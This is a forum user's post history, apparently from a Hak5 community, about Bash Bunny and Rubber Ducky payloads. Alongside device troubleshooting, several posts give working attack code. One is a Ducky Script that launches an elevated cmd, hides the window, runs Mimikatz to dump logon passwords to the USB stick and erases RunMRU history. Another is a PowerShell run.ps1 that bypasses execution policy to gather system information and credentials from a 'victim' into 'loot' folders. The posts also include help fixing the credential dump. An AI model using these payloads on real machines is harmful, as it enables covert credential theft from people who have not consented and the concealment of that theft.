Jump to content

MrSnowMonster

Active Members
  • Posts

    33
  • Joined

  • Last visited

  • Days Won

    1

Posts posted by MrSnowMonster

  1. 14 hours ago, PoSHMagiC0de said:

    Applauds....

    That is some sexy Powershell.  I have very little to offer but have some.

    If you want to make sure your script works in all versions of Powershell (like version 2), avoid CIM classes.  I like them too in Powershell 4 and 5 but 2 doesn't know them.  Sticking to wmi will avoid this.

    On line 9 in your run.ps1 file you can get some performance, if there are a lot of disks, by using a query.  The more you do on the left of the pipe, the more wmi filters and less Powershell has to filter after the pipe.  Wmi filters faster and will return less.  Example replacing line 9 and appending onward.

    
    $wmiQuery = "Select DeviceID from Win32_LogicalDisk Where VolumeName = '$($VolumeName)'"
    $BackupDrive = (get-wmiobject -query $wmiQuery).DeviceID

    On line 33 of same file if you are trying to get the parent path, there is a command for that.

    
    $TARGETDIR = Split-Path $TARGETDIR -Parent

    In info.ps1 file I just see refactoring needing to be done.  You are hitting the wmi class of the same classes too many times.  That can slow you down.  I see networkadapterconfiguration about 3-4 times in there.  Just pull it all into a variable and then sort out all the parts you need from that variable like just do a full pull of the networkadapterconfiguration..no pipe filters.  In the next lines, filter that one variable that holds all the adapters of their parts and when done throw it away.  Same goes for physicalmemory.

    That is what I can see from a glance.

    Thank you for replying will try to change it up a bit when my exams are over :P

  2. 7 minutes ago, bananacake said:

    Thanks for such a quick reply :D Send me your bitcoin address or paypal in a PM for a little donation.

    I have already been fiddling with the run.ps1 before your post. Unfortunately not had any luck so far.

    I added mimikatz.ps1 to the payloads folder (https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1)

    I have made the following changes to run.ps1:

    #Remove run history
    powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"

    #Get the path and file name that you are using for output
    # find connected bashbunny drive:
    $VolumeName = "DUCKY"
    $computerSystem = Get-CimInstance CIM_ComputerSystem
    $backupDrive = $null
    get-wmiobject win32_logicaldisk | % {
        if ($_.VolumeName -eq $VolumeName) {
            $backupDrive = $_.DeviceID
        }
    }

    #See if a loot folder exist in usb. If not create one
    $TARGETDIR = $backupDrive + "\loot"
    if(!(Test-Path -Path $TARGETDIR )){
        New-Item -ItemType directory -Path $TARGETDIR
    }

    #See if a info folder exist in loot folder. If not create one
    $TARGETDIR = $backupDrive + "\loot\info"
    if(!(Test-Path -Path $TARGETDIR )){
        New-Item -ItemType directory -Path $TARGETDIR
    }

    #See if a passwords folder exist in loot folder. If not create one
    $TARGETDIR = $backupDrive + "\loot\passwords"
    if(!(Test-Path -Path $TARGETDIR )){
        New-Item -ItemType directory -Path $TARGETDIR
    }

    #Create a path that will be used to make the file
    $datetime = get-date -f yyyy-MM-dd_HH-mm
    $backupPath = $backupDrive + "\loot\info\" + $computerSystem.Name + " - " + $datetime + ".txt"
    $passwordPath = $backupDrive + "\loot\passwords\" + "passwords" + ".txt"

    #Create output from info script
    $TARGETDIR = $MyInvocation.MyCommand.Path
    $TARGETDIR = $TARGETDIR -replace ".......$"
    cd $TARGETDIR
    PowerShell.exe -ExecutionPolicy Bypass -File info.ps1 > $backupPath
    PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts >> $passwordPath

    When I run run.ps1 info.ps1 executes correctly as usual, afterwards a new powershell window is opened and a passwords folder is created along with a passwords.txt file.

    However the passwords.txt file is empty. I'm pretty sure mimikatz is running as my cursor displays a loading timer icon, it's just not outputting the file correctly and I'm not sure exactly what to do to fix this. Any help is appreciated. Thankyou.

     

    Try using PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1 -DumpCerts > $passwordPath

    Not really sure what the problem is but looks like you may have one > too much :) If i were you I would try to run the line in a powershell command window and see if there is any errors showing up :D You could also try to remove the -DumpCerts :) Just happy to help, finally had a break from my exams so I use the time to code :P

  3. 43 minutes ago, bananacake said:

    Thanks a bunch SnowMonster. This script is excellent and works perfectly. I wonder if it would be possible to add mimikatz to the payload after the information gathering stage.

    Other mimikatz payloads first start cmd.exe as admin before executing mimikatz through powershell commands. For example:

    DELAY 2000
    GUI r
    DELAY 500
    STRING powershell Start-Process cmd.exe -verb runAs
    ENTER
    DELAY 2000
    ALT y
    DELAY 500
    CTRL C
    REM *** Obfuscate the command prompt ***
    STRING mode con:cols=18 lines=1
    ENTER
    STRING color FE
    ENTER
    REM *** Define Ducky Drive as DUCK ***
    STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set duck=%d
    ENTER
    DELAY 500
    REM *** Run Mimikatz from Ducky Drive ***
    STRING powershell %duck%\im.ps1 -DumpCreds >> %duck%\%computername%-passwords.txt
    ENTER
    DELAY 100
    STRING privilege::debug
    ENTER
    STRING sekurlsa::logonPasswords full
    ENTER
    DELAY 10000
    STRING exit
    ENTER
    DELAY 5000
    REM *** Clear duck variable, history, and GTFO ***
    STRING set "duck="
    ENTER
    DELAY 100
    STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
    ENTER
    DELAY 100
    STRING color 08
    ENTER
    DELAY 100
    STRING exit
    ENTER

    As you can see this is slower then simply executing several pre-made powershell files and requires admin cmd to start (which may be restricted in corporate environments.) I am wondering if it is possible to cut this stage out entirely and create a payload similar to your information gathering payload?

    Thanks again.

    This is very easy to do, just make a script file which holds the mimikatz code and place this code in the run.ps1 script file in the payloads folder :) 
    The code: "PowerShell.exe -ExecutionPolicy Bypass -File mimikatz.ps1"

    remember to remove the " thingy :) 

    A little info abouth why this works. The code bypases windows script policy so it wont need to allow scipts to run and in this way makes it possible to run scripts without using an administrator account :) Your welcome! Always fun to know people find the help I give and things I create usefull! :D 

    !!EDIT!!

    If I were you I would look at the run.ps1 script and see if I could understand how it works. It may help you later, because its a great way to bypass a lot of uneccesary typing. :D

    Remember to remove the last string in run.ps1 if you want to change it so it only runs mimikatz

  4. 57 minutes ago, bananacake said:

    Your old Github links don't work. Mind sharing your new tweaked payload again?

    Thankyou.

    Hey! I no longer have this script because I started using The twin duck firmware and made my bashbunny script work on the rubberducky. :) It still does the same, but because of the twin duck firmware you no longer have to send the information through mail, and it is A LOT faster. It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files i upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY. Hope this helps :)

     

    !!Edit!!

    Rememeber this only works if you use the twin duck firmware on you rubberducky. :)

    The information you grab from you victim will be saved inside a folder called Loot.

    !!Edit!!

     

    You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version 

    or download the rar file I uploaded here. :)

    info.zip

  5. 9 hours ago, Sebkinne said:

    I agree. I'm not sure of what exactly the organization should be, but I'm welcoming suggestions.

    Maybe OS -> Type of payload or Type -> OS?

    I thought about first a folder for which os and also a multi os folder for attacks that work on multiple os, then inside the os folder what type of attack (Like HID, RNDIS_ETHERNET,  ECM_ETHERNET and so on). :P and maybe also combined attacks like HID and ECM_ETHERNET :D

  6. You could always copy this inside your payload:

     

    check_switch() {
    	switch1=`cat /sys/class/gpio_sw/PA8/data`
    	switch2=`cat /sys/class/gpio_sw/PL4/data`
    	switch3=`cat /sys/class/gpio_sw/PL3/data`
    	if [ "x$switch1" = "x0" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x1" ]; then
    		SWITCH_POSITION="switch1"
    	elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x0" ] && [ "x$switch3" = "x1" ]; then
    		SWITCH_POSITION="switch2"
    	elif [ "x$switch1" = "x1" ] && [ "x$switch2" = "x1" ] && [ "x$switch3" = "x0" ]; then
    		SWITCH_POSITION="switch3"
    	else
    		SWITCH_POSITION="invalid"
    	fi
    }
    
    check_switch

    This is basicly what the bunny helper does. If this doesnt work, then something is wrong with your bashbunny...

  7. Hey everyone i just had a thought... wouldnt it be better to categorize all payloads in different folders for what it is meant to attack? Like a folder for windows attacks, one for mac, one for linux, one for universal, one for bashbunny innstallers and so on.. I just feel like the library is going to be very messy if not :/

    • Upvote 3
  8. 29 minutes ago, MrSnowMonster said:

    Ok so I think there have been a problem with my bashbunny because I have had trouble installing both the tools and duckytools so what I would like is to reset it like it was when I got it, but using the recoverymode does nothing... All my files are still there, including those in udisk and /root/tools/ :/ Could anyone help me out?

    At the moment I just installed all the tools manually :)

  9. Ok so I think there have been a problem with my bashbunny because I have had trouble installing both the tools and duckytools so what I would like is to reset it like it was when I got it, but using the recoverymode does nothing... All my files are still there, including those in udisk and /root/tools/ :/ Could anyone help me out?

  10. 12 hours ago, Black_chameleon said:

    I deleted the network connection in Windows twice and started over....

    Then on the third try, internet!! I have no clue what I did differently.  Maybe try again?

     

    9 hours ago, crackdraco said:

    My experience was similar.  i booted the device, configured the 'NDIS' adapter, removed the adapter and repeated - at least a half dozen times.  Then apt-get worked.  It did nothing as the device was up to date.

    Hey since you managed to get it working, could you share a screenshot of your settings? Like how the connection is set up and so on? I cant get it to work...

  11. 8 minutes ago, rastating said:

    Yup and when I ssh into it it works like normal, just that internet connection wont work :/ And I cant use rdp checker without pyOpenSSL which I need a network connection to download and install :/

  12. Did anyone of you get a working internet connection?

    I am trying to apt-get update, but it just continue to connect to httpredir.debian.com...


    root@bunny:/pentest/impacket/examples# apt-get update
    0% [Connecting to httpredir.debian.org (140.211.166.202)]

     

    I think I need to update because every time I try to run rdp_check.py I get The error under:
    root@bunny:/pentest/impacket/examples# rdp_check.py
    CRITICAL:root:pyOpenSSL is not installed, can't continue

  13. Did anyone of you get a working internet connection?

    I am trying to apt-get update, but it just continue to connect to httpredir.debian.com...


    root@bunny:/pentest/impacket/examples# apt-get update
    0% [Connecting to httpredir.debian.org (140.211.166.202)]

     

    I think I need to update because every time I try to run rdp_check.py I get The error under:
    root@bunny:/pentest/impacket/examples# rdp_check.py
    CRITICAL:root:pyOpenSSL is not installed, can't continue
     

     

     

  14. 14 minutes ago, VincBreaker said:

    I guess everyone has it's little mistakes... I once was developing a small platformer and have been reworking the basic controls. The character just didn't wan't to walk to the right, no matter how much I debugged it... After a few hours, I realized having pressed the left arrow key the whole time :grin:

    Hahahah well at least I am not alone ???

  15. 1 hour ago, Darren Kitchen said:

    Restore the Bash Bunny from the recovery partition:

    1. Set the Bash Bunny switch to position 3 (arming mode)
    2. Plug the Bash Bunny into a USB power source. The LED will momentarily light green. As soon as the LED goes off, unplug the Bash Bunny.
    3. Repeat the previous step twice more (for a total of 3 times)
    4. Plug the Bash Bunny into a USB power source and leave for 4 minutes. The LED will light RED to indicate recovery. When the light returns to BLUE blinking, the Bash Bunny has recovered.

    @Darren Kitchen You should probably put this up on the wiki so others who get into problems know how to restore it :)

    • Upvote 2
  16. 2 minutes ago, MrSnowMonster said:

    Whait what? Ive been sitting here terrified out of my ass and you are telling me its not recovery mode??? Btw it happened after i tried to set network to shared so thats may be why... Did you get shared connection to work? I mean so I will be able to update the bashbunny

    Turns out its still working but now it gets the blinking red lights every time i try to set up shared connections.. cant get wifi on it any other way

  17. 2 minutes ago, wrewdison said:

    Check that whatever you were doing didn't set the led to blink red.  Some of the payloads I've seen do that in certain conditions (such as not obtaining an ip, in the nmap payload).  The red flash only means recovery mode if it happens while it's booting. 

    Whait what? Ive been sitting here terrified out of my ass and you are telling me its not recovery mode??? Btw it happened after i tried to set network to shared so thats may be why... Did you get shared connection to work? I mean so I will be able to update the bashbunny

  18. Played around with my bashbunny and installed tools. While I tried to setup a shared connection the LED started blinking red (Recovery mode). I have now been stuck in this mode for 15 minutes pls help :(

  19. !! EDIT !!

    !! Now updated so it should be very fast and effective !!

    !! This is a remake of my bashbunny script so it works on the rubberducky too https://github.com/hak5/bashbunny-payloads/tree/master/payloads/library/recon/InfoGrabber !!

    Hello everyone!

    I made this nice script that gives you a lot of information about your victims computer and stores it on the rubberducky if it runs twin duck firmware.

    for example their ip and public ip :happy: 

    Change it as much as you want, but please make me as source since I spent around 15 hours on this :cool: 

    It executes in around 6 seconds :) It also finds more information than it did before :) Just drag the files i upload into your rubberducky running twin duck firmware. You can also see the inject.txt in there so you can convert it to the language you want :) The rubberducky also has to have the name DUCKY for this script to work, because the command it runs is searching for a usb with the name DUCKY.

     

    Rememeber this only works if you use the twin duck firmware on you rubberducky. :)

    The information you grab from you victim will be saved inside a folder called Loot.

    You can either download the files from my github https://github.com/MrSnowMonster/MrSnows-SnowGlobe/tree/master/Tech/Hacking and Pentesting/RubberDucky/Infograbber rubberducky version 

    or download the rar file I uploaded here. :)

    info.zip

×
×
  • Create New...